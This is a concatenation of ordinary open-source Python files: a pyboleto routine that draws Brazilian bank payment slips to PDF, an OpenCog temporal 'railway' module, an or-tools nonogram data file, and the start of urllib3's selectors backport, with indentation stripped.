self.pdfCanvas.drawString(
0 + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.space,
sacado0
)
self.pdfCanvas.drawString(
self.width - (30 * mm) - (35 * mm) - (40 * mm) + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.space,
boletoDados.format_nosso_numero()
)
self.pdfCanvas.drawString(
self.width - (30 * mm) - (35 * mm) + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.space,
boletoDados.numero_documento
)
self.pdfCanvas.drawString(
self.width - (30 * mm) + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.space,
boletoDados.data_documento.strftime('%d/%m/%Y')
)
valorDocumento = self._formataValorParaExibir(
boletoDados.valor_documento
)
self.pdfCanvas.drawString(
0 + self.space,
(((linhaInicial + 0) * self.heightLine)) + self.space,
boletoDados.cedente_endereco
)
self.pdfCanvas.drawString(
self.width - (30 * mm) + self.space,
(((linhaInicial + 0) * self.heightLine)) + self.space,
valorDocumento
)
self.pdfCanvas.setFont('Courier', 9)
demonstrativo = boletoDados.demonstrativo[0:25]
for i in range(len(demonstrativo)):
self.pdfCanvas.drawString(
2 * self.space,
(-3 * cm + ((linhaInicial + 0) * self.heightLine)) -
(i * heighFont),
demonstrativo[i])
self.pdfCanvas.setFont('Helvetica', 9)
self.pdfCanvas.restoreState()
return (self.width, ((linhaInicial + 3) * self.heightLine))
def _drawHorizontalCorteLine(self, x, y, width):
self.pdfCanvas.saveState()
self.pdfCanvas.translate(x, y)
self.pdfCanvas.setLineWidth(1)
self.pdfCanvas.setDash(1, 2)
self.__horizontalLine(0, 0, width)
self.pdfCanvas.restoreState()
def _drawVerticalCorteLine(self, x, y, height):
self.pdfCanvas.saveState()
self.pdfCanvas.translate(x, y)
self.pdfCanvas.setLineWidth(1)
self.pdfCanvas.setDash(1, 2)
self.__verticalLine(0, 0, height)
self.pdfCanvas.restoreState()
def _drawReciboCaixa(self, boletoDados, x, y):
"""Imprime o Recibo do Caixa
:param boletoDados: Objeto com os dados do boleto a ser preenchido.
Deve ser subclasse de :class:`pyboleto.data.BoletoData`
:type boletoDados: :class:`pyboleto.data.BoletoData`
"""
self.pdfCanvas.saveState()
self.pdfCanvas.translate(x, y)
# De baixo para cima posicao 0,0 esta no canto inferior esquerdo
self.pdfCanvas.setFont('Helvetica', self.fontSizeTitle)
y = 1.5 * self.heightLine
self.pdfCanvas.drawRightString(
self.width,
(1.5 * self.heightLine) + self.deltaTitle - 1,
'Autenticação Mecânica / Ficha de Compensação'
)
# Primeira linha depois do codigo de barra
y += self.heightLine
self.pdfCanvas.setLineWidth(2)
self.__horizontalLine(0, y, self.width)
y += self.heightLine
yy = y
self.pdfCanvas.drawString(0, y + self.deltaTitle, 'Pagador')
sacado = boletoDados.sacado
# Linha grossa dividindo o Sacado
y += self.heightLine
self.pdfCanvas.setLineWidth(2)
self.__horizontalLine(0, y, self.width)
self.pdfCanvas.setFont('Helvetica', self.fontSizeValue)
for i in range(len(sacado)):
L = simpleSplit(sacado[i],'Helvetica',self.fontSizeValue,350)
yyy = y
for t in L:
self.pdfCanvas.drawString(
15 * mm,
(yyy - 10) - (i * self.deltaFont),
t
)
yyy -= self.pdfCanvas._leading
self.pdfCanvas.setFont('Helvetica', self.fontSizeTitle)
# Sacado documento
self.pdfCanvas.drawString(self.width - (44 * mm), yy + self.deltaTitle, 'CPF/CNPJ')
sacado_documento = boletoDados.sacado_documento
self.pdfCanvas.setFont('Helvetica', self.fontSizeValue)
self.pdfCanvas.drawString(self.width - (44 * mm), yy + self.deltaTitle - 13, sacado_documento)
self.pdfCanvas.setFont('Helvetica', self.fontSizeTitle)
# Linha vertical limitando todos os campos da direita
self.pdfCanvas.setLineWidth(1)
self.__verticalLine(self.width - (45 * mm), y, 9 * self.heightLine)
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'(=) Valor cobrado'
)
# Campos da direita
y += self.heightLine
self.__horizontalLine(self.width - (45 * mm), y, 45 * mm)
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'(+) Outros acréscimos'
)
y += self.heightLine
self.__horizontalLine(self.width - (45 * mm), y, 45 * mm)
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'(+) Mora/Multa'
)
y += self.heightLine
self.__horizontalLine(self.width - (45 * mm), y, 45 * mm)
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'(-) Outras deduções'
)
y += self.heightLine
self.__horizontalLine(self.width - (45 * mm), y, 45 * mm)
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'(-) Descontos/Abatimentos'
)
self.pdfCanvas.drawString(
0,
y + self.deltaTitle,
'Instruções'
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeValue)
instrucoes = boletoDados.instrucoes
for i in range(len(instrucoes)):
self.pdfCanvas.drawString(
2 * self.space,
y - (i * self.deltaFont),
instrucoes[i]
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeTitle)
# Linha horizontal com primeiro campo Uso do Banco
y += self.heightLine
self.__horizontalLine(0, y, self.width)
self.pdfCanvas.drawString(0, y + self.deltaTitle, 'Uso do banco')
self.__verticalLine((30) * mm, y, 2 * self.heightLine)
self.pdfCanvas.drawString(
(30 * mm) + self.space,
y + self.deltaTitle,
'Carteira'
)
self.__verticalLine((30 + 20) * mm, y, self.heightLine)
self.pdfCanvas.drawString(
((30 + 20) * mm) + self.space,
y + self.deltaTitle,
'Espécie'
)
self.__verticalLine(
(30 + 20 + 20) * mm,
y,
2 * self.heightLine
)
self.pdfCanvas.drawString(
((30 + 40) * mm) + self.space,
y + self.deltaTitle,
'Quantidade'
)
self.__verticalLine(
(30 + 20 + 20 + 20 + 20) * mm, y, 2 * self.heightLine)
self.pdfCanvas.drawString(
((30 + 40 + 40) * mm) + self.space, y + self.deltaTitle, 'Valor')
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'(=) Valor documento'
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeValue)
self.pdfCanvas.drawString(
(30 * mm) + self.space,
y + self.space,
boletoDados.carteira
)
self.pdfCanvas.drawString(
((30 + 20) * mm) + self.space,
y + self.space,
boletoDados.especie
)
self.pdfCanvas.drawString(
((30 + 20 + 20) * mm) + self.space,
y + self.space,
boletoDados.quantidade
)
valor = self._formataValorParaExibir(boletoDados.valor)
self.pdfCanvas.drawString(
((30 + 20 + 20 + 20 + 20) * mm) + self.space,
y + self.space,
valor
)
valorDocumento = self._formataValorParaExibir(
boletoDados.valor_documento
)
self.pdfCanvas.drawRightString(
self.width - 2 * self.space,
y + self.space,
valorDocumento
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeTitle)
# Linha horizontal com primeiro campo Data documento
y += self.heightLine
self.__horizontalLine(0, y, self.width)
self.pdfCanvas.drawString(
0,
y + self.deltaTitle,
'Data do documento'
)
self.pdfCanvas.drawString(
(30 * mm) + self.space,
y + self.deltaTitle,
'N. do documento'
)
self.pdfCanvas.drawString(
((30 + 40) * mm) + self.space,
y + self.deltaTitle,
'Espécie doc'
)
self.__verticalLine(
(30 + 20 + 20 + 20) * mm,
y,
self.heightLine
)
self.pdfCanvas.drawString(
((30 + 40 + 20) * mm) + self.space,
y + self.deltaTitle,
'Aceite'
)
self.pdfCanvas.drawString(
((30 + 40 + 40) * mm) + self.space,
y + self.deltaTitle,
'Data processamento'
)
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'Nosso número'
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeValue)
self.pdfCanvas.drawString(
0,
y + self.space,
boletoDados.data_documento.strftime('%d/%m/%Y')
)
self.pdfCanvas.drawString(
(30 * mm) + self.space,
y + self.space,
boletoDados.numero_documento
)
self.pdfCanvas.drawString(
((30 + 40) * mm) + self.space,
y + self.space,
boletoDados.especie_documento
)
self.pdfCanvas.drawString(
((30 + 40 + 20) * mm) + self.space,
y + self.space,
boletoDados.aceite
)
self.pdfCanvas.drawString(
((30 + 40 + 40) * mm) + self.space,
y + self.space,
boletoDados.data_processamento.strftime('%d/%m/%Y')
)
self.pdfCanvas.drawRightString(
self.width - 2 * self.space,
y + self.space,
boletoDados.format_nosso_numero()
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeTitle)
# Linha horizontal com primeiro campo Cedente
y += self.heightLine
self.__horizontalLine(0, y, self.width)
self.pdfCanvas.drawString(0, y + self.deltaTitle, 'Beneficiário')
self.__verticalLine(
(30 + 20 + 20 + 20 + 20) * mm,
y,
self.heightLine
)
self.pdfCanvas.drawString(
((30 + 40 + 40) * mm) + self.space,
y + self.deltaTitle,
'CPF/CNPJ Beneficiário'
)
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'Agência/Código do Beneficiário'
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeValue)
self.pdfCanvas.drawString(0, y + self.space, boletoDados.cedente)
self.pdfCanvas.drawString(
((30 + 40 + 40) * mm) + self.space,
y + self.space,
boletoDados.cedente_documento
)
self.pdfCanvas.drawRightString(
self.width - 2 * self.space,
y + self.space,
boletoDados.agencia_conta_cedente
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeTitle)
# Linha horizontal com primeiro campo Local de Pagamento
y += self.heightLine
self.__horizontalLine(0, y, self.width)
self.pdfCanvas.drawString(
0,
y + self.deltaTitle,
'Local de pagamento'
)
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'Vencimento'
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeValue)
self.pdfCanvas.drawString(
0,
y + self.space,
boletoDados.local_pagamento
)
self.pdfCanvas.drawRightString(
self.width - 2 * self.space,
y + self.space,
boletoDados.data_vencimento.strftime('%d/%m/%Y')
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeTitle)
# Linha grossa com primeiro campo logo tipo do banco
self.pdfCanvas.setLineWidth(3)
y += self.heightLine
self.__horizontalLine(0, y, self.width)
self.pdfCanvas.setLineWidth(2)
self.__verticalLine(40 * mm, y, self.heightLine) # Logo Tipo
self.__verticalLine(60 * mm, y, self.heightLine) # Numero do Banco
if boletoDados.logo_image:
logo_image_path = self._load_image(boletoDados.logo_image)
self.pdfCanvas.drawImage(
logo_image_path,
0,
y + self.space + 1,
40 * mm,
self.heightLine,
preserveAspectRatio=True,
anchor='sw'
)
self.pdfCanvas.setFont('Helvetica-Bold', 18)
self.pdfCanvas.drawCentredString(
50 * mm,
y + 2 * self.space,
boletoDados.codigo_dv_banco
)
self.pdfCanvas.setFont('Helvetica-Bold', 11.5)
self.pdfCanvas.drawRightString(
self.width,
y + 2 * self.space,
boletoDados.linha_digitavel
)
# Codigo de barras
self._codigoBarraI25(boletoDados.barcode, 2 * self.space, 0)
self.pdfCanvas.restoreState()
return self.width, (y + self.heightLine)
def drawBoletoCarneDuplo(self, boletoDados1, boletoDados2=None):
"""Imprime um boleto tipo carnê com 2 boletos por página.
:param boletoDados1: Objeto com os dados do boleto a ser preenchido.
Deve ser subclasse de :class:`pyboleto.data.BoletoData`
:param boletoDados2: Objeto com os dados do boleto a ser preenchido.
Deve ser subclasse de :class:`pyboleto.data.BoletoData`
:type boletoDados1: :class:`pyboleto.data.BoletoData`
:type boletoDados2: :class:`pyboleto.data.BoletoData`
"""
y = 5 * mm
d = self.drawBoletoCarne(boletoDados1, y)
y += d[1] + 6 * mm
#self._drawHorizontalCorteLine(0, y, d[0])
y += 7 * mm
if boletoDados2:
self.drawBoletoCarne(boletoDados2, y)
def drawBoletoCarne(self, boletoDados, y):
"""Imprime apenas dos boletos do carnê.
Esta função não deve ser chamada diretamente, ao invés disso use a
drawBoletoCarneDuplo.
:param boletoDados: Objeto com os dados do boleto a ser preenchido.
Deve ser subclasse de :class:`pyboleto.data.BoletoData`
:type boletoDados: :class:`pyboleto.data.BoletoData`
"""
x = 15 * mm
d = self._drawReciboSacadoCanhoto(boletoDados, x, y)
x += d[0] + 8 * mm
self._drawVerticalCorteLine(x, y, d[1])
x += 8 * mm
d = self._drawReciboCaixa(boletoDados, x, y)
x += d[0]
return x, d[1]
def drawBoleto(self, boletoDados):
"""Imprime Boleto Convencional
Você pode chamar este método diversas vezes para criar um arquivo com
várias páginas, uma por boleto.
:param boletoDados: Objeto com os dados do boleto a ser preenchido.
Deve ser subclasse de :class:`pyboleto.data.BoletoData`
:type boletoDados: :class:`pyboleto.data.BoletoData`
"""
x = 9 * mm # margem esquerda
y = 10 * mm # margem inferior
self._drawHorizontalCorteLine(x, y, self.width)
y += 4 * mm # distancia entre linha de corte e barcode
d = self._drawReciboCaixa(boletoDados, x, y)
y += d[1] + (12 * mm) # distancia entre Recibo caixa e linha de corte
self._drawHorizontalCorteLine(x, y, self.width)
y += 20 * mm
d = self._drawReciboSacado(boletoDados, x, y)
y += d[1]
return (self.width, y)
def nextPage(self):
"""Força início de nova página"""
self.pdfCanvas.showPage()
def save(self):
"""Fecha boleto e constroi o arquivo"""
self.pdfCanvas.save()
def __horizontalLine(self, x, y, width):
self.pdfCanvas.line(x, y, x + width, y)
def __verticalLine(self, x, y, width):
self.pdfCanvas.line(x, y, x, y + width)
def __centreText(self, x, y, text):
self.pdfCanvas.drawCentredString(self.refX + x, self.refY + y, text)
def __rightText(self, x, y, text):
self.pdfCanvas.drawRightString(self.refX + x, self.refY + y, text)
def _formataValorParaExibir(self, nfloat):
if nfloat:
txt = nfloat
txt = txt.replace('.', ',')
else:
txt = ""
return txt
def _codigoBarraI25(self, num, x, y):
"""Imprime Código de barras otimizado para boletos
O código de barras é otmizado para que o comprimeto seja sempre o
estipulado pela febraban de 103mm.
"""
# http://en.wikipedia.org/wiki/Interleaved_2_of_5
altura = 13 * mm
comprimento = 103 * mm
tracoFino = 0.254320987654 * mm # Tamanho correto aproximado
bc = I2of5(num,
barWidth=tracoFino,
ratio=3,
barHeight=altura,
bearers=0,
quiet=0,
checksum=0)
# Recalcula o tamanho do tracoFino para que o cod de barras tenha o
# comprimento correto
tracoFino = (tracoFino * comprimento) / bc.width
bc.__init__(num, barWidth=tracoFino)
bc.drawOn(self.pdfCanvas, x, y)
| bsd-3-clause |
yantrabuddhi/opencog | opencog/python/spatiotemporal/temporal_events/composition/railway_framework.py | 34 | 8054 | from itertools import chain
from spatiotemporal.temporal_events.composition.emperical_distribution import overlaps
from spatiotemporal.temporal_events.util import Dijkstra
from utility.functions import almost_equals
__author__ = 'keyvan'
EPSILON = 1e-12
class Wagon(object):
def __init__(self, a, b):
self._a = float(a)
self.length = float(b - a)
self.bound_wagons = set()
self._parent = None
self.heads = []
self.tails = []
self.is_moving = False
@property
def parent(self):
return self._parent
@property
def is_root(self):
return self._parent is None
@property
def a(self):
return self._a
@property
def b(self):
return self._a + self.length
@property
def root(self):
wagon = self
while not wagon.is_root:
# print wagon.name
wagon = wagon._parent
return wagon
@property
def bounds(self):
return self.a, self.b
def bind(self, other):
root = self.root
root_other = other.root
if root_other is root:
return
root.bound_wagons.add(root_other)
for wagon in root_other.bound_wagons:
root.bound_wagons.add(wagon)
wagon._parent = root
root_other.bound_wagons = set()
root_other._parent = root
def move_to(self, a, b=None):
if b is None:
b = a + self.length
root = self.root
scale = (b - a) / self.length
bias = a - scale * self.a
if not (scale == 1.0 and bias == 0.0):
root.transform(scale, bias)
def find_move_cover_areas(self, a, b):
return (min(self.b, b), max(self.b, b)), (min(self.a, a), max(self.a, a))
def _move_heads_and_tails(self, a, b):
head_bounds, tail_bounds = self.find_move_cover_areas(a, b)
for head in self.heads:
if overlaps(head.bounds, head_bounds):
head.move_to(b, b + head.length)
for tail in self.tails:
if overlaps(tail.bounds, tail_bounds):
tail.move_to(a - tail.length, a)
def _move_to(self, a, b):
self._move_heads_and_tails(a, b)
self._a, self.length = a, b - a
def transform(self, scale, bias):
if self.is_moving:
return
self.is_moving = True
transform_start = self.a * scale + bias
transform_end = self.b * scale + bias
for wagon in self.bound_wagons:
wagon_a = wagon.a * scale + bias
wagon_b = wagon.b * scale + bias
wagon._move_to(wagon_a, wagon_b)
self._move_heads_and_tails(transform_start, transform_end)
self._a, self.length = transform_start, transform_end - transform_start
self.is_moving = False
def __str__(self, indent=0):
children = indent * ' ' + repr(self) + '\n'
for wagon in self.bound_wagons:
children += (indent + 1) * ' ' + wagon.__str__(indent + 1)
return children
def __repr__(self):
return 'Wagon(a: {0}, b: {1})'.format(self.a, self.b)
class Rail(list):
def __init__(self, iterable=None):
wagons = None
if iterable is not None:
for wagon in iterable:
if wagons is None:
wagons = [wagon]
previous_wagon = wagon
continue
previous_wagon.heads.append(wagon)
wagons.append(wagon)
wagon.tails.append(previous_wagon)
previous_wagon = wagon
list.__init__(self, wagons)
def append(self, wagon):
list.append(self, wagon)
wagon.tails.append(list.__getitem__(self, -2))
list.__getitem__(self, -2).heads.append(wagon)
def insert(self, index, wagon):
if index < 0:
raise NotImplementedError
list.insert(self, index, wagon)
if index > 0:
wagon.tails.append(list.__getitem__(self, index - 1))
list.__getitem__(self, index - 1).heads.append(wagon)
if index + 1 < len(self):
list.__getitem__(self, index - 1).heads.remove(list.__getitem__(self, index + 1))
if index < len(self):
wagon.heads.append(list.__getitem__(self, index + 1))
list.__getitem__(self, index + 1).tails.append(wagon)
if index - 1 >= 0:
list.__getitem__(self, index + 1).tails.remove(list.__getitem__(self, index - 1))
class RailwaySystem(object):
def __init__(self):
self.rails = {}
self.memo = []
self.dag = {}
def add_rail(self, rail_key):
self.memo.append(('add_rail', [rail_key]))
wagon_1 = Wagon(0, 10)
wagon_2 = Wagon(10, 20)
wagon_1.name = rail_key + '0'
wagon_2.name = rail_key + '1'
self.rails[rail_key] = Rail([wagon_1, wagon_2])
self.dag[wagon_1] = {wagon_2: 1}
self.dag[wagon_2] = {}
def move_wagon(self, rail_key, wagon_index, a, b):
self.memo.append(('move_wagon', (rail_key, wagon_index, a, b)))
self.rails[rail_key][wagon_index].move_to(a, b)
def bind_wagons_before_horizontal(self, rail_1_key, wagon_1_index, rail_2_key, wagon_2_index):
self.memo.append(('bind_wagons_before_horizontal', (rail_1_key, wagon_1_index, rail_2_key, wagon_2_index)))
wagon_1 = self.rails[rail_1_key][wagon_1_index]
wagon_2 = self.rails[rail_2_key][wagon_2_index]
if wagon_1.b > wagon_2.a:
wagon_2.move_to(wagon_1.b)
wagon_2.tails.append(wagon_1)
wagon_1.heads.append(wagon_2)
self.dag[wagon_1][wagon_2] = 1
def bind_wagons_after_horizontal(self, rail_1_key, wagon_1_index, rail_2_key, wagon_2_index):
self.bind_wagons_before_horizontal(rail_2_key, wagon_2_index, rail_1_key, wagon_1_index)
def bind_wagons_vertical(self, rail_1_key, wagon_1_index, rail_2_key, wagon_2_index):
wagon_1 = self.rails[rail_1_key][wagon_1_index]
wagon_2 = self.rails[rail_2_key][wagon_2_index]
self.memo.append(('bind_wagons_vertical', (rail_1_key, wagon_1_index, rail_2_key, wagon_2_index)))
wagon_2.bind(wagon_1)
equals_a = almost_equals(wagon_1.a, wagon_2.a, EPSILON)
equals_b = almost_equals(wagon_1.b, wagon_2.b, EPSILON)
if (wagon_1.a < wagon_2.a or equals_a) and (wagon_1.b < wagon_2.b or equals_b):
self.dag[wagon_1][wagon_2] = 1
if (wagon_1.a > wagon_2.a or equals_a) and (wagon_1.b > wagon_2.b or equals_b):
self.dag[wagon_2][wagon_1] = 1
def move_and_bind_vertical(self, rail_1_key, wagon_1_index, rail_2_key, wagon_2_index, a, b):
self.move_wagon(rail_1_key, wagon_1_index, a, b)
self.bind_wagons_vertical(rail_1_key, wagon_1_index, rail_2_key, wagon_2_index)
def are_in_same_vertical_tree(self, wagon_1, wagon_2):
return wagon_1.root is wagon_2.root
def are_in_same_horizontal_tree(self, wagon_1, wagon_2):
start = wagon_1
end = wagon_2
dijkstra_1 = Dijkstra(self.dag, start, end)
dijkstra_2 = Dijkstra(self.dag, end, start)
return end in dijkstra_1[0] or start in dijkstra_2[0]
def compress(self):
for rail_key, rail in self.rails.items():
wagon_tail = rail[0]
wagon_head = rail[-1]
self.move_wagon(rail_key, 0, wagon_head.a - wagon_tail.length, wagon_head.a)
def __getitem__(self, rail_key):
return self.rails[rail_key]
def __str__(self):
result = ''
for key, rail in self.rails.items():
result += str(key) + ': ' + str(rail) + '\n'
return result
def __deepcopy__(self, memo):
copy = RailwaySystem()
for action in self.memo:
copy.__getattribute__(action[0])(*action[1])
return copy
def __repr__(self):
return str(self)
def __iter__(self):
return chain(*self.rails.values())
| agpl-3.0 |
petesburgh/or-tools | examples/python/data/nonogram_regular/nonogram_p200.py | 74 | 1810 | # Copyright 2010 Hakan Kjellerstrand [email protected]
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Nonogram problem from Gecode: P200
# http://www.gecode.org/gecode-doc-latest/classNonogram.html
#
rows = 25
row_rule_len = 7
row_rules = [
[0,0,0,0,2,2,3],
[0,0,4,1,1,1,4],
[0,0,4,1,2,1,1],
[4,1,1,1,1,1,1],
[0,2,1,1,2,3,5],
[0,1,1,1,1,2,1],
[0,0,3,1,5,1,2],
[0,3,2,2,1,2,2],
[2,1,4,1,1,1,1],
[0,2,2,1,2,1,2],
[0,1,1,1,3,2,3],
[0,0,1,1,2,7,3],
[0,0,1,2,2,1,5],
[0,0,3,2,2,1,2],
[0,0,0,3,2,1,2],
[0,0,0,0,5,1,2],
[0,0,0,2,2,1,2],
[0,0,0,4,2,1,2],
[0,0,0,6,2,3,2],
[0,0,0,7,4,3,2],
[0,0,0,0,7,4,4],
[0,0,0,0,7,1,4],
[0,0,0,0,6,1,4],
[0,0,0,0,4,2,2],
[0,0,0,0,0,2,1]
]
cols = 25
col_rule_len = 6
col_rules = [
[0,0,1,1,2,2],
[0,0,0,5,5,7],
[0,0,5,2,2,9],
[0,0,3,2,3,9],
[0,1,1,3,2,7],
[0,0,0,3,1,5],
[0,7,1,1,1,3],
[1,2,1,1,2,1],
[0,0,0,4,2,4],
[0,0,1,2,2,2],
[0,0,0,4,6,2],
[0,0,1,2,2,1],
[0,0,3,3,2,1],
[0,0,0,4,1,15],
[1,1,1,3,1,1],
[2,1,1,2,2,3],
[0,0,1,4,4,1],
[0,0,1,4,3,2],
[0,0,1,1,2,2],
[0,7,2,3,1,1],
[0,2,1,1,1,5],
[0,0,0,1,2,5],
[0,0,1,1,1,3],
[0,0,0,4,2,1],
[0,0,0,0,0,3]
]
| apache-2.0 |
zvezdan/pip | src/pip/_vendor/urllib3/util/selectors.py | 138 | 21147 | # Backport of selectors.py from Python 3.5+ to support Python < 3.4
# Also has the behavior specified in PEP 475 which is to retry syscalls
# in the case of an EINTR error. This module is required because selectors34
# does not follow this behavior and instead returns that no dile descriptor
# events have occurred rather than retry the syscall. The decision to drop
# support for select.devpoll is made to maintain 100% test coverage.
import errno
import math
import select
import socket
import sys
import time
from collections import namedtuple, Mapping
try:
monotonic = time.monotonic
except (AttributeError, ImportError): # Python 3.3<
monotonic = time.time
EVENT_READ = (1 << 0)
EVENT_WRITE = (1 << 1)
HAS_SELECT = True # Variable that shows whether the platform has a selector.
_SYSCALL_SENTINEL = object() # Sentinel in case a system call returns None.
_DEFAULT_SELECTOR = None
class SelectorError(Exception):
def __init__(self, errcode):
super(SelectorError, self).__init__()
self.errno = errcode
def __repr__(self):
return "<SelectorError errno={0}>".format(self.errno)
def __str__(self):
return self.__repr__()
def _fileobj_to_fd(fileobj):
""" Return a file descriptor from a file object. If
given an integer will simply return that integer back. """
if isinstance(fileobj, int):
fd = fileobj
else:
try:
fd = int(fileobj.fileno())
except (AttributeError, TypeError, ValueError):
raise ValueError("Invalid file object: {0!r}".format(fileobj))
if fd < 0:
raise ValueError("Invalid file descriptor: {0}".format(fd))
return fd
# Determine which function to use to wrap system calls because Python 3.5+
# already handles the case when system calls are interrupted.
if sys.version_info >= (3, 5):
def _syscall_wrapper(func, _, *args, **kwargs):
""" This is the short-circuit version of the below logic
because in Python 3.5+ all system calls automatically restart
and recalculate their timeouts. """
try:
return func(*args, **kwargs)
except (OSError, IOError, select.error) as e:
errcode = None
if hasattr(e, "errno"):
errcode = e.errno
raise SelectorError(errcode)
else:
def _syscall_wrapper(func, recalc_timeout, *args, **kwargs):
""" Wrapper function for syscalls that could fail due to EINTR.
All functions should be retried if there is time left in the timeout
in accordance with PEP 475. """
timeout = kwargs.get("timeout", None)
if timeout is None:
expires = None
recalc_timeout = False
else:
timeout = float(timeout)
if timeout < 0.0: # Timeout less than 0 treated as no timeout.
expires = None
else:
expires = monotonic() + timeout
args = list(args)
if recalc_timeout and "timeout" not in kwargs:
raise ValueError(
"Timeout must be in args or kwargs to be recalculated")
result = _SYSCALL_SENTINEL
while result is _SYSCALL_SENTINEL:
try:
result = func(*args, **kwargs)
# OSError is thrown by select.select
# IOError is thrown by select.epoll.poll
# select.error is thrown by select.poll.poll
# Aren't we thankful for Python 3.x rework for exceptions?
except (OSError, IOError, select.error) as e:
# select.error wasn't a subclass of OSError in the past.
errcode = None
if hasattr(e, "errno"):
errcode = e.errno
elif hasattr(e, "args"):
errcode = e.args[0]
# Also test for the Windows equivalent of EINTR.
is_interrupt = (errcode == errno.EINTR or (hasattr(errno, "WSAEINTR") and
errcode == errno.WSAEINTR))
if is_interrupt:
if expires is not None:
current_time = monotonic()
if current_time > expires:
raise OSError(errno=errno.ETIMEDOUT)
if recalc_timeout:
if "timeout" in kwargs:
kwargs["timeout"] = expires - current_time
continue
if errcode:
raise SelectorError(errcode)
else:
raise
return result
SelectorKey = namedtuple('SelectorKey', ['fileobj', 'fd', 'events', 'data'])
class _SelectorMapping(Mapping):
""" Mapping of file objects to selector keys """
def __init__(self, selector):
self._selector = selector
def __len__(self):
return len(self._selector._fd_to_key)
def __getitem__(self, fileobj):
try:
fd = self._selector._fileobj_lookup(fileobj)
return self._selector._fd_to_key[fd]
except KeyError:
raise KeyError("{0!r} is not registered.".format(fileobj))
def __iter__(self):
return iter(self._selector._fd_to_key)
class BaseSelector(object):
""" Abstract Selector class
A selector supports registering file objects to be monitored
for specific I/O events.
A file object is a file descriptor or any object with a
`fileno()` method. An arbitrary object can be attached to the
file object which can be used for example to store context info,
a callback, etc.
A selector can use various implementations (select(), poll(), epoll(),
and kqueue()) depending on the platform. The 'DefaultSelector' class uses
the most efficient implementation for the current platform.
"""
def __init__(self):
# Maps file descriptors to keys.
self._fd_to_key = {}
# Read-only mapping returned by get_map()
self._map = _SelectorMapping(self)
def _fileobj_lookup(self, fileobj):
""" Return a file descriptor from a file object.
This wraps _fileobj_to_fd() to do an exhaustive
search in case the object is invalid but we still
have it in our map. Used by unregister() so we can
unregister an object that was previously registered
even if it is closed. It is also used by _SelectorMapping
"""
try:
return _fileobj_to_fd(fileobj)
except ValueError:
# Search through all our mapped keys.
for key in self._fd_to_key.values():
if key.fileobj is fileobj:
return key.fd
# Raise ValueError after all.
raise
def register(self, fileobj, events, data=None):
""" Register a file object for a set of events to monitor. """
if (not events) or (events & ~(EVENT_READ | EVENT_WRITE)):
raise ValueError("Invalid events: {0!r}".format(events))
key = SelectorKey(fileobj, self._fileobj_lookup(fileobj), events, data)
if key.fd in self._fd_to_key:
raise KeyError("{0!r} (FD {1}) is already registered"
.format(fileobj, key.fd))
self._fd_to_key[key.fd] = key
return key
def unregister(self, fileobj):
""" Unregister a file object from being monitored. """
try:
key = self._fd_to_key.pop(self._fileobj_lookup(fileobj))
except KeyError:
raise KeyError("{0!r} is not registered".format(fileobj))
# Getting the fileno of a closed socket on Windows errors with EBADF.
except socket.error as e: # Platform-specific: Windows.
if e.errno != errno.EBADF:
raise
else:
for key in self._fd_to_key.values():
if key.fileobj is fileobj:
self._fd_to_key.pop(key.fd)
break
else:
raise KeyError("{0!r} is not registered".format(fileobj))
return key
def modify(self, fileobj, events, data=None):
""" Change a registered file object monitored events and data. """
# NOTE: Some subclasses optimize this operation even further.
try:
key = self._fd_to_key[self._fileobj_lookup(fileobj)]
except KeyError:
raise KeyError("{0!r} is not registered".format(fileobj))
if events != key.events:
self.unregister(fileobj)
key = self.register(fileobj, events, data)
elif data != key.data:
# Use a shortcut to update the data.
key = key._replace(data=data)
self._fd_to_key[key.fd] = key
return key
def select(self, timeout=None):
""" Perform the actual selection until some monitored file objects
are ready or the timeout expires. """
raise NotImplementedError()
def close(self):
""" Close the selector. This must be called to ensure that all
underlying resources are freed. """
self._fd_to_key.clear()
self._map = None
def get_key(self, fileobj):
""" Return the key associated with a registered file object. """
mapping = self.get_map()
if mapping is None:
raise RuntimeError("Selector is closed")
try:
return mapping[fileobj]
except KeyError:
raise KeyError("{0!r} is not registered".format(fileobj))
def get_map(self):
""" Return a mapping of file objects to selector keys """
return self._map
def _key_from_fd(self, fd):
""" Return the key associated to a given file descriptor
Return None if it is not found. """
try:
return self._fd_to_key[fd]
except KeyError:
return None
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
# Almost all platforms have select.select()
if hasattr(select, "select"):
class SelectSelector(BaseSelector):
""" Select-based selector. """
def __init__(self):
super(SelectSelector, self).__init__()
self._readers = set()
self._writers = set()
def register(self, fileobj, events, data=None):
key = super(SelectSelector, self).register(fileobj, events, data)
if events & EVENT_READ:
self._readers.add(key.fd)
if events & EVENT_WRITE:
self._writers.add(key.fd)
return key
def unregister(self, fileobj):
